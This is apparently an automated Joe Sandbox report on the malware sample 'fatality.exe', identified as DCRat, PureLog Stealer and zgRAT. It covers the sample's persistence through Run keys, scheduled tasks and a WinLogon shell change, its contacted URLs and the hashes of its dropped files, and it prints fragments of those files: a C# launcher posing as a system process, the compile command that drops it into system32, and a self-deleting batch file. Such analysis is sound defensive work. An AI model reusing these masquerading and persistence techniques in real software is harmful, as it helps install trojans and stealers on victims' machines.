                                                                                                        http://codecmd01.googlecode.com/files/tjcm.gif?explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://codecmd02.googlecode.com/googlecode.com/4explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://codecmd03.googlecode.com/files/tjcm.gifHexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://codecmd02.googlecode.com/files/tjcm.gifmexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://codecmd02.googlecode.com/rexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://codecmd02.googlecode.com/ultipart/x-mixed-replaceexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://codecmd01.googlecode.com/files/tjcm.gifyexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.enigmaprotector.com/fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecontainerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, containerReview.exe, 0000000D.00000002.1906268968.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://codecmd01.googlecode.com/files/tjcm.gif4explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://codecmd01.googlecode.com/files/tjcm.gif/kexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://codecmd01.googlecode.com/files/tjcm.gifrexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://codecmd02.googlecode.com/files/tjcm.gifm.exeexplorer.exe, 00000003.00000002.2940622995.0000000000617000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
74.125.133.82 | unknown | United States | 15169 | GOOGLEUS | false
64.233.167.82 | unknown | United States | 15169 | GOOGLEUS | false
66.102.1.82 | googlecode.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590002
Start date and time: 2025-01-13 13:16:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 55
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fatality.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@56/42@3/3
EGA Information:
• Successful, ratio: 18.2%
HCA Information: Failed
Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Exclude process from analysis (whitelisted): Conhost.exe, consent.exe, SIHClient.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                                                  • Excluded domains from analysis (whitelisted): 373292cm.nyashka.top, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, PID 5672 because it is empty
                                                                                                                                  • Execution Graph export aborted for target DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, PID 7656 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Idle.exe, PID 7232 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Idle.exe, PID 7468 because it is empty
                                                                                                                                  • Execution Graph export aborted for target containerReview.exe, PID 7868 because it is empty
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 7540 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 7752 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target smss.exe, PID 404 because it is empty
                                                                                                                                  • Execution Graph export aborted for target smss.exe, PID 7480 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
07:17:07 | API Interceptor | 3958x Sleep call for process: svchost.exe modified
07:17:07 | API Interceptor | 1598x Sleep call for process: explorer.exe modified
12:17:08 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
12:17:16 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO
12:17:23 | Task Scheduler | Run new task: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj path: "C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
12:17:23 | Task Scheduler | Run new task: DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD path: "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
12:17:24 | Task Scheduler | Run new task: Idle path: "C:\blockcomSession\Idle.exe"
12:17:24 | Task Scheduler | Run new task: IdleI path: "C:\blockcomSession\Idle.exe"
12:17:24 | Task Scheduler | Run new task: smss path: "C:\blockcomSession\smss.exe"
12:17:24 | Task Scheduler | Run new task: smsss path: "C:\blockcomSession\smss.exe"
12:17:25 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\blockcomSession\Idle.exe"
12:17:27 | Task Scheduler | Run new task: containerReview path: "C:\blockcomSession\containerReview.exe"
12:17:27 | Task Scheduler | Run new task: containerReviewc path: "C:\blockcomSession\containerReview.exe"
12:17:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
12:17:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\blockcomSession\smss.exe"
12:17:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
12:17:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\blockcomSession\Idle.exe"
12:18:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
12:18:15 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\blockcomSession\smss.exe"
12:18:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
12:18:32 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\blockcomSession\Idle.exe"
12:18:41 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
12:18:49 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\blockcomSession\smss.exe"
12:18:58 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
12:19:15 | Autostart | Run: WinLogon Shell "C:\blockcomSession\Idle.exe"
Match | Associated Sample Name / URL | Detection | Threat Name

C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
  fatality.exe | malicious | DCRat, PureLog Stealer, zgRAT

C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
  fatality.exe | malicious | DCRat, PureLog Stealer, zgRAT

C:\Users\user\Desktop\FJTVnRjh.log
  SearchIndexer.exe | malicious | DCRat, Neshta, PureLog Stealer, zgRAT
  fatality.exe | malicious | DCRat, PureLog Stealer, zgRAT
  OneDriveStandaloneUpdater.exe | malicious | DCRat
  VIyu4dC9CU.exe | malicious | DCRat, PureLog Stealer, zgRAT
  OisrvsB6Ea.exe | malicious | DCRat, PureLog Stealer, zgRAT
  ntoskrnl2.exe | malicious | DCRat, PureLog Stealer, zgRAT
  top.exe | malicious | DCRat, PureLog Stealer, zgRAT
  DC86.exe | malicious | DCRat, PureLog Stealer, zgRAT
  WinPerfcommon.exe | malicious | DCRat, PureLog Stealer, zgRAT
  Udzp7lL5ns.exe | malicious | DCRat, PureLog Stealer, zgRAT

Process: C:\blockcomSession\containerReview.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2006016
Entropy (8bit): 7.565400810273061
Encrypted: false
SSDEEP: 24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
MD5: F568E43BC473CD8CEB2553C58194DF61
SHA1: 14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
SHA-256: C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
SHA-512: 47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 77%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: fatality.exe, Detection: malicious
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (947), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):947
                                                                                                                                                          Entropy (8bit):5.911830657087546
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:3AYhIwXcKyIMLVx0giSm5bbrmpivt9BTGSut8C3:3AYHXVyFX0giSkHmpivtDySuKC3
                                                                                                                                                          MD5:7C966539B6DF88CFF8BAB45F74B21CEB
                                                                                                                                                          SHA1:7F5E1D4CE2DB7E2FD6A504B55BE76594FAEA6722
                                                                                                                                                          SHA-256:DE0E0F0A41284DB32A404B87DABCAAB4B2AAFE6F6917F70731C98DEA12FC6B13
                                                                                                                                                          SHA-512:90EF1C4EC6292D766FFA0B26DAE741CEBB425A298D3F517062415DF4ED040E68EC397D5C0AA3560BB0E6AC5CE40AE3D5C5E7B47270E09AA44D442AF7E049717E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          File Type:CSV text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):847
                                                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1396
                                                                                                                                                          Entropy (8bit):5.350961817021757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):374
                                                                                                                                                          Entropy (8bit):4.89520453047671
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2NHOaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLSb
                                                                                                                                                          MD5:6231949DB938DE71D60D3564C03A7940
                                                                                                                                                          SHA1:FCEAA74521738C6A563CC0574D5F22F993671962
                                                                                                                                                          SHA-256:88FCEF55DEA97CCF670FBBE26F9C4B48B142BDD1031EC75B955E3252E7A8841D
                                                                                                                                                          SHA-512:34B9686BFD214A5A31625F3F57A944CFA583A3D8DAE756269E949B0DF10965581C35B55A85ED484053E3781A863C247B328E61413C6439B1DFBC1300CB8E6F20
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\blockcomSession\Idle.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):250
                                                                                                                                                          Entropy (8bit):5.056548111562771
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f7s2vWQDH:Hu7L//TRq79cQWfTBH
                                                                                                                                                          MD5:A3718BF142205516D59110195A695E24
                                                                                                                                                          SHA1:93CFF628D10AC5B485999CF32BF95930CEA32C25
                                                                                                                                                          SHA-256:AA21D707E7389617AC9C0E27F589DB4D3D97DC358AB90B20772655ED6764DE4E
                                                                                                                                                          SHA-512:342269C2DAFEBBF9CA92CC54521B56380D6C22D6C366CD8DA5142477BECFA6BBF292AA102087C6C6DEB634688F10197A5A1D1C1BA1B4137418577993BE5D7E98
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.0.cs"
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (325), with CRLF, CR line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):746
                                                                                                                                                          Entropy (8bit):5.245831370226225
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:lI/u7L//TRq79cQWfTBOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/Vq79tWfTUKax5DqBVKVrdFAMBt
                                                                                                                                                          MD5:F7C12B33AD8A8850FDCE1C01542A428F
                                                                                                                                                          SHA1:F5F247A59E288C5C11749258976A316611B86385
                                                                                                                                                          SHA-256:A6E6F2F6884E7AF955DE1E1E1AA2B628D205820CC21B87EF3E93B40EEB4B4ACD
                                                                                                                                                          SHA-512:19559425F54056589FDD457782ED0CBBC1A03283D7C7DBAD247471CFB455FCF0C1A0884FC0E27E2C7620DCAA57EA35F464A3487B450934D4AAEF0BB2A7C20167
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\blockcomSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):203
                                                                                                                                                          Entropy (8bit):5.091976395814207
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9mionqQLNIvBktKcKZG1t+kiE2J5X:hCijTg3Nou1SV+DEBmvKOZG1wkn23ff
                                                                                                                                                          MD5:4CF2F62DE6CDA6A55D0F47066964A06F
                                                                                                                                                          SHA1:6895EC89ECC41D2CD00AF40AF36E3B802B7F9E2E
                                                                                                                                                          SHA-256:BBCE55184D6197320078586A9ABB4DC6E57FD516E338A9573B95651DCE71CD09
                                                                                                                                                          SHA-512:2B50E5C652ADAF9B3903D53076915058FFC6359F3AF4A902800682D310152C4D74E3A9E5D7504E6D8BC9BF8CFD1E5CD38CAB260710A3CFD5D758C3E86A8E291F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\blockcomSession\smss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Q048Q85hCW.bat"
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Mon Jan 13 13:17:26 2025, 1st section name ".debug$S"
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1952
                                                                                                                                                          Entropy (8bit):4.543503612091088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:H7ZbW97Oi9/BDfHFWwKmwNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:fiF1l1KPMluOulajfqXSfbNtmh5Z
                                                                                                                                                          MD5:1F32A603BF296E0D3B947FA8F8A50482
                                                                                                                                                          SHA1:4EF1ABE0F7F40FD5CFA74A1796CE1E54E8EE9A08
                                                                                                                                                          SHA-256:263D9B57B936B32DCB058A733B034768FE040FE1B4BB714EFCD94BB7BB79F6DD
                                                                                                                                                          SHA-512:B364966FCEBD94BB0F3C06EEEF8039C4C1A5D57374C54EEA09AA351342698D3B4A87C3AEC66FE22FE5AC0A69840C6B20895E72C9ACBF28E930C09138C00F6994
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L...f..g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESD8F5.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\blockcomSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):25
                                                                                                                                                          Entropy (8bit):4.213660689688185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Q4zZqO0:3zkJ
                                                                                                                                                          MD5:7D1FF832E615CC3267E4F964D1F2686E
                                                                                                                                                          SHA1:5823228BB435382664BD50DEA6CD36F06F899AA8
                                                                                                                                                          SHA-256:70B18433166C75C4839F6EC4B9658AA0B01A81896894E7B0321BCFCDB15130CC
                                                                                                                                                          SHA-512:50B27346C3CC51DFA6C10B35A19AE96830ECE2E030E8EA2102D0DEE1DC8695F9C46A80DBB3E76AC759A54552921F5F02D583B490BE3066EF5C296228A18A0AB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:Zqzz0wY7iC6pM0223l2JtAKiP
                                                                                                                                                          Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0126942760400774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXrUvltt9Xblt59Xh9XR5+1lf35X:rl3b/VFQrEPbltD7Ovf5
                                                                                                                                                          MD5:F10E5B486D7DBF6443F1DA41A2FCA7BF
                                                                                                                                                          SHA1:7731EBD181B21CF08DD3DC5B2459753A65B58873
                                                                                                                                                          SHA-256:F11E65F002A4876F68ACEEFCC4BFFD640B70347ECFE622392DA62716F601E7E6
                                                                                                                                                          SHA-512:8A90A253BBA99C6D3568BCD9BED0356A0EF9951131A6BD01C01A678C7F03760E8037B76278A085F18C4348EA2047C1F636D598B6011F21D1AB7FE9C596D78932
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0150719828554693
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXcKkStt9Xblt59Xh9XR5+1lf35X:rl3b/VFQcKkWbltD7Ovf5
                                                                                                                                                          MD5:37B8083CC26072B0F5B8358F7C6237E2
                                                                                                                                                          SHA1:A52EA0425506D3C8BE4E6F3D19B7DC51F614EA4F
                                                                                                                                                          SHA-256:FD9F07201AABA26ADE6016957ABD3010AC4B959C69676988B247C849C8D3BD29
                                                                                                                                                          SHA-512:25C1A49FC398F906D455BC1BEAE18BE951FE000CC30AAD9E49E4C08868607C73313985E84F1CEE39DF81C4EB614813B3CC9B390DC3220F56EC3308858AD05D48
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\Resources\svchost.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16384
                                                                                                                                                          Entropy (8bit):0.4022769148265937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                                                                          MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                                                                          SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                                                                          SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                                                                          SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0149379474325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXvit9Xblt59Xh9XR5+1lf35X:rl3b/VFQSbltD7Ovf5
                                                                                                                                                          MD5:48B2AE498263AE8D95A5B45F66D47B89
